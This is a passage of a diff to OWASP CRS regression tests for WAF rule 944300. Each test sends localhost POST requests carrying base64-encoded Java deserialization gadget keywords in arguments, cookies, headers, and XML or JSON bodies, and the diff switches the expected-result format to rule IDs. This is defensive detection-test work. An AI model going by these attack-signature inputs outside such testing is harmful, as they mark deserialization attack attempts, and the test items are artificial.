"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 161 desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 163 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 167 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 